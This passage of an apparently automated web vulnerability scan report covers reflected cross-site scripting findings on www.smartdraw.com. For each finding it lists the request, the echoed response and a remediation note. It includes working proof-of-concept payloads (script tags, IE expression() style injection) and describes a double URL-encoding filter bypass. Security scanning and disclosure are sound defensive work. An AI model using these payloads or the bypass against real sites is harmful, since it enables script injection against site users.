Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=srd; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: ASP.NET_SessionId=3xzk4kqkklhxog55txic5t55; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=7224F4A2-DD79-495E-BE74-D529A406C1A4; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: SDLINKID=42485; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13666
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">
   <head>
    <!-- WEB4 -->
       <meta http-equiv="Co
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/smartdraw.asp?id=104640/x22d9eb8"><script>alert(1)</script>02409d83cd8" rel="nofollow" target="_blank">
...[SNIP]...

1.194. http://www.smartdraw.com/specials/smartdraw.asp [id parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The value of the id request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 84bb8"><script>alert(1)</script>626eeb09dab was submitted in the id parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/smartdraw.asp?id=84bb8"><script>alert(1)</script>626eeb09dab HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=srd; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: ASP.NET_SessionId=qm4opd450d3t0ub4vr15fu55; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=ADF8185B-28EB-4439-83C3-ED4994B5DBD1; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: SDLINKID=42485; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13596
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">
   <head>
    <!-- WEB1 -->
       <meta http-equiv="Co
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/smartdraw.asp?id=84bb8"><script>alert(1)</script>626eeb09dab&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px;
...[SNIP]...

1.195. http://www.smartdraw.com/specials/smartdraw.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 9a0d8"><script>alert(1)</script>19f5f3d2721 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/smartdraw.asp?9a0d8"><script>alert(1)</script>19f5f3d2721=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Date: Thu, 03 Feb 2011 20:29:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=srd; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: ASP.NET_SessionId=b13fkq55uk0h0r551wlijart; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=0C716256-E9A8-4F56-B555-3BBBF2BE9A9A; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Set-Cookie: SDLINKID=42485; expires=Sun, 03-Feb-2041 20:29:04 GMT; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 13589
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">
   <head>
    <!-- WEB3 -->
       <meta http-equiv="Co
...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/specials/smartdraw.asp?9a0d8"><script>alert(1)</script>19f5f3d2721=1" rel="nofollow" target="_blank">
...[SNIP]...

1.196. http://www.smartdraw.com/specials/smartdraw.asp [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /specials/smartdraw.asp

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f6931"><script>alert(1)</script>1538439b5db was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.

Request

GET /specials/smartdraw.asp?f6931"><script>alert(1)</script>1538439b5db=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response

HTTP/1.1 200 OK
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:03 GMT
Content-Length: 13589
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=srd; expires=Sun, 03-Feb-2041 20:29:03 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:03 GMT; path=/
Set-Cookie: ASP.NET_SessionId=i4f3to45piqrah5515hwc2e5; path=/; HttpOnly
Set-Cookie: SDPROSPECTID=9F5DDF94-02C1-40EC-BAF3-B26FC6BAC886; expires=Sun, 03-Feb-2041 20:29:03 GMT; path=/
Set-Cookie: SDLINKID=42485; expires=Sun, 03-Feb-2041 20:29:03 GMT; path=/
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:03 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html lang="en">
   <head>
    <!-- WEB2 -->
       <meta http-equiv="Co
...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/specials/smartdraw.asp?f6931"><script>alert(1)</script>1538439b5db=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

1.197. http://www.smartdraw.com/support/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /support/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 37c3c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e679ad699d2 was submitted in the REST URL parameter 1. This input was echoed as 37c3c"style="x:expression(alert(1))"e679ad699d2 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /37c3c%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522e679ad699d2/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:59 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=o1ruv145ogifusajxf15cv45; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8711
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/37c3c"style="x:expression(alert(1))"e679ad699d2/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

1.198. http://www.smartdraw.com/support/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /support/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5cd21%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229340ce36f21 was submitted in the REST URL parameter 1. This input was echoed as 5cd21"style="x:expression(alert(1))"9340ce36f21 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /support5cd21%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25229340ce36f21/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=0vrtws45owfyd0ykewtjomyf; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8760
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/support5cd21"style="x:expression(alert(1))"9340ce36f21/x22/" rel="nofollow" target="_blank">
...[SNIP]...

1.199. http://www.smartdraw.com/support/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /support/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 20991%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522284b0792e42 was submitted in the REST URL parameter 2. This input was echoed as 20991"style="x:expression(alert(1))"284b0792e42 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /support/x2220991%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522284b0792e42 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:30:06 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: ASP.NET_SessionId=oo5bbiaclrpecvf51w0jwaml; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8760
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/support/x2220991"style="x:expression(alert(1))"284b0792e42/" rel="nofollow" target="_blank">
...[SNIP]...

1.200. http://www.smartdraw.com/support/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /support/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 5ce71%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221f48f65f3b6 was submitted in the REST URL parameter 2. This input was echoed as 5ce71"style="x:expression(alert(1))"1f48f65f3b6 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /support/5ce71%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%25221f48f65f3b6 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:09 GMT
Content-Length: 8739
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:09 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:09 GMT; path=/
Set-Cookie: ASP.NET_SessionId=lyrquzi1ro0haeato0nugmis; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:30:09 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/support/5ce71"style="x:expression(alert(1))"1f48f65f3b6/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80px
...[SNIP]...

1.201. http://www.smartdraw.com/support/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /support/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 79e74"style%3d"x%3aexpression(alert(1))"af3d991af1d was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 79e74"style="x:expression(alert(1))"af3d991af1d in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /support/x22?79e74"style%3d"x%3aexpression(alert(1))"af3d991af1d=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:48 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:48 GMT; path=/
Set-Cookie: ASP.NET_SessionId=oc0z2245wuz2afzvjdfzixel; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8781
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/support/x22/?79e74"style="x:expression(alert(1))"af3d991af1d=1" rel="nofollow" target="_blank">
...[SNIP]...

1.202. http://www.smartdraw.com/support/x22 [name of an arbitrarily supplied request parameter]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /support/x22

Issue detail

The name of an arbitrarily supplied request parameter is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 396ed"style%3d"x%3aexpression(alert(1))"eac095684e0 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed as 396ed"style="x:expression(alert(1))"eac095684e0 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Request

GET /support/x22?396ed"style%3d"x%3aexpression(alert(1))"eac095684e0=1 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:49 GMT
Content-Length: 8781
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:49 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:49 GMT; path=/
Set-Cookie: ASP.NET_SessionId=2smue255v4gtmz55m2l3rh45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:49 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/support/x22/?396ed"style="x:expression(alert(1))"eac095684e0=1&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:80p
...[SNIP]...

1.203. http://www.smartdraw.com/training/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /training/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 68b35%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a8b1b996b was submitted in the REST URL parameter 1. This input was echoed as 68b35"style="x:expression(alert(1))"d2a8b1b996b in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /training68b35%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%2522d2a8b1b996b/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Date: Thu, 03 Feb 2011 20:29:56 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:56 GMT; path=/
Set-Cookie: ASP.NET_SessionId=1y4wau550cpob2bb3amrf145; path=/; HttpOnly
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 8767
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<a href="http://www.facebook.com/sharer.php?u=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/training68b35"style="x:expression(alert(1))"d2a8b1b996b/x22/" rel="nofollow" target="_blank">
...[SNIP]...

1.204. http://www.smartdraw.com/training/x22 [REST URL parameter 1]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /training/x22

Issue detail

The value of REST URL parameter 1 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload fc351%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252246b2268b321 was submitted in the REST URL parameter 1. This input was echoed as fc351"style="x:expression(alert(1))"46b2268b321 in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 1 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /fc351%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252246b2268b321/x22 HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:29:59 GMT
Content-Length: 8711
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:29:59 GMT; path=/
Set-Cookie: ASP.NET_SessionId=twmrveyjx5im0l30e30blh45; path=/; HttpOnly
Pragma: no-cache
Expires: Thu, 03 Feb 2011 20:29:59 GMT
Connection: close


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN"
   "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">

<html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en" lang="en">

...[SNIP]...
<iframe src="http://www.facebook.com/plugins/like.php?href=http://www.smartdraw.com/filenotfound.aspx?404;http://www.smartdraw.com:80/fc351"style="x:expression(alert(1))"46b2268b321/x22/&amp;layout=standard&amp;show_faces=true&amp;width=500&amp;action=like&amp;colorscheme=light&amp;height=80" scrolling="no" frameborder="0" style="border:none; overflow:hidden; width:500px; height:
...[SNIP]...

1.205. http://www.smartdraw.com/training/x22 [REST URL parameter 2]  previous  next

Summary

Severity:   High
Confidence:   Certain
Host:   http://www.smartdraw.com
Path:   /training/x22

Issue detail

The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload f20b1%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252235c6b1442fc was submitted in the REST URL parameter 2. This input was echoed as f20b1"style="x:expression(alert(1))"35c6b1442fc in the application's response.

This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response. The PoC attack demonstrated uses a dynamically evaluated expression with a style attribute to introduce arbirary JavaScript into the document. Note that this technique is specific to Internet Explorer, and may not work on other browsers.

The application attempts to block certain characters that are often used in XSS attacks but this can be circumvented by double URL-encoding the required characters - for example, by submitting %253c instead of the < character.

Note that a redirection occurred between the attack request and the response containing the echoed input. It is necessary to follow this redirection for the attack to succeed. When the attack is carried out via a browser, the redirection will be followed automatically.

Remediation detail

There is probably no need to perform a second URL-decode of the value of REST URL parameter 2 as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.

Request

GET /training/x22f20b1%2522style%253d%2522x%253aexpression%2528alert%25281%2529%2529%252235c6b1442fc HTTP/1.1
Host: www.smartdraw.com
Accept: */*
Accept-Language: en
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)
Connection: close

Response (redirected)

HTTP/1.1 404 Not Found
Cache-Control: public,no-cache,no-store,max-age=0,must-revalidate,proxy-revalidate
Date: Thu, 03 Feb 2011 20:30:06 GMT
Content-Length: 8767
Content-Type: text/html; charset=utf-8
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Set-Cookie: EXP=ste; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
Set-Cookie: REFID=2; expires=Sun, 03-Feb-2041 20:30:06 GMT; path=/
